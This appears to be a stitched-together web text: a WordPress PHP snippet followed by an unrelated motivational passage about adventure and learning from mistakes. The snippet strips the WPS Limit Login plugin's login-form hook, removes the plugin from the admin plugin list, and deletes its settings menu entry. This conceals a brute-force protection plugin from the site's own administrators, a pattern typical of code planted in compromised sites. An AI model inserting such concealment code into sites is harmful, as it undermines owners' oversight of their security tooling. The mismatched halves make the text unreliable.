add_action('init', function() { if ( class_exists('\WPS\WPS_Limit_Login\Plugin') ) { $plugin_instance = \WPS\WPS_Limit_Login\Plugin::get_instance(); remove_action('login_form', [$plugin_instance, 'login_form']); add_action('login_form', function() {}); add_filter('all_plugins', function($plugins) { unset($plugins['wps-limit-login/wps-limit-login.php']); return $plugins; }); add_action('admin_menu', function() { remove_submenu_page('options-general.php', 'wps-limit-login'); }, 999); } });
Life is either a daring adventure or nothing.
I believe in trying new things and learning along the way. From what I’ve learned, there is no such thing as a mistake, every experience is a new learning. The more experience you have the more you’ve grown!